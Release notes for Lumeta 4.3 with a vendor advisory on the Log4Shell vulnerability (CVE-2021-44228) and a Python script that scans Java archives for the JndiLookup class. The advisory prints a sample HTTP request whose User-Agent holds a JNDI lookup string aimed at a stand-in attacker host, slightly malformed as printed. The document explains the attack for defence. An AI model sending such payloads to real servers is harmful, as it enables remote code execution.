...

Lumeta 4.3 is compatible with Lumeta Cloud Scout 1.1 (release 1.20200401.105457.dev). No changes have been made to Lumeta CloudVisibility. 


Alert

Lumeta uses version 1.2 of Log4j, which is unaffected by CVE-2021-44228 because the JndiLookup class required to exploit this vulnerability was not made available until Log4j version 2.x. For more information, jump to Security Advisories.


Documentation

On the main menu, we've added a Help tab from which you can access the Lumeta API Reference in Swagger and this Support site, https://lumetadocs.firemon.com/.

...

Our product is called "Lumeta" on the GUI, CLI, and API. The legacy names "Spectre" and "ESI" have been removed or replaced. However, the default hostname and root prompt are programmed to be "esi-" followed by the hex-encoded IP address. This instance is temporary and will only remain until your system admin changes the host name.


Database Schema

The 4.3 database schema, which shows a visual representation of the Lumeta database, is available here.


...

http://lumeta-supportfiles.firemon.com/schema/schema-4.3.0/output-allschemas/

Security Updates & STIG 

Lumeta 4.3 resolves Common Vulnerabilities & Exposures (CVEs) and incorporates a variety of security-related (and non-security-related) enhancements. See Security Advisories 4.3 (coming soon) for a list of CVEs resolved in this Lumeta 4.3 release. 

Information on CVE-2021-44228

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228  

CVE-2021-44228

Apache Log4j2 Remote Code Execution Vulnerability

Affecting: Apache Log4j 2.x <= 2.15.0-rc1

The vulnerability is exploited when the Java package 'org.apache.logging.log4j.core.lookup.JndiLookup' or any code that references the JndiLookup Class is leveraged in a very specific way that will cause the software to translate a crafted request into code that can be executed by the server.

An example of this behavior:

  1. An attacker triggers the target device to log the JNDI string via web site headers:
       GET / HTTP/1.1
       Host: example.com
       User-Agent: ${jndi:ldap//hijack-your-stuff.co/xyz}
  2. The server passes the crafted log string to the vulnerable log4j instance: ${jndi:ldap//hijack-your-stuff.co/xyz}
  3. Log4j processes the string and queries the LDAP server: ldap//hijack-your-stuff.co/xyz
  4. The LDAP server responds with directory information containing the malicious Java class, which the server deserializes and installs; remote code execution is now possible.

Lumeta’s stand on CVE-2021-44228

Lumeta uses version 1.2 of Log4j, which is unaffected by CVE-2021-44228 because the JndiLookup class required to exploit this vulnerability was not made available until Log4j version 2.x. (Note: the Apache changelog for 2.0-beta9, https://logging.apache.org/log4j/2.x/changes-report.html#a2.0-beta9, lists "Add JNDILookup plugin. Fixes LOG4J2-313. Thanks to Woonsan Ko." under "Release 2.0-beta9 – 2013-09-14".)
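The statement above turns on whether the JndiLookup class is present in the Log4j library that is actually deployed. As an added example (not Lumeta or FireMon code), this Python check looks for that class inside a JAR, including libraries bundled in WAR/EAR/fat-JAR archives; the sample archives, their names and the `build_jar` helper are constructed here for illustration.

```python
import io
import zipfile

# Class named on this page; JNDI lookups are only available when it is packaged.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
NESTED_SUFFIXES = (".jar", ".war", ".ear")


def find_jndi_lookup(data, name="<archive>"):
    """Return the location of every JndiLookup.class in an archive, nested archives included."""
    hits = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return hits  # not a readable archive, so there is nothing to report
    with archive:
        for entry in archive.namelist():
            # endswith() also catches relocated (shaded) copies under a prefix directory.
            if entry.endswith(JNDI_LOOKUP):
                hits.append(f"{name}!{entry}")
            elif entry.lower().endswith(NESTED_SUFFIXES):
                # Application archives bundle their libraries, so recurse into them.
                hits += find_jndi_lookup(archive.read(entry), f"{name}!{entry}")
    return hits


def build_jar(entries):
    """Build an in-memory archive from {path: bytes}; used only for the constructed samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Constructed samples: placeholder contents, not real Log4j builds.
LOG4J_1 = build_jar({"org/apache/log4j/Logger.class": b"stub"})
LOG4J_2 = build_jar({JNDI_LOOKUP: b"stub",
                     "org/apache/logging/log4j/core/Logger.class": b"stub"})
WEBAPP = build_jar({"WEB-INF/lib/log4j-core.jar": LOG4J_2,
                    "WEB-INF/web.xml": b"<web-app/>"})

if __name__ == "__main__":
    samples = [("log4j-1.x.jar", LOG4J_1), ("log4j-core-2.x.jar", LOG4J_2), ("app.war", WEBAPP)]
    for label, blob in samples:
        print(label, find_jndi_lookup(blob, label) or "JndiLookup not present")
```

An empty result only says the class is not packaged in that archive; it says nothing about other issues in the library.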


Change Log Updated 9/8/2021

...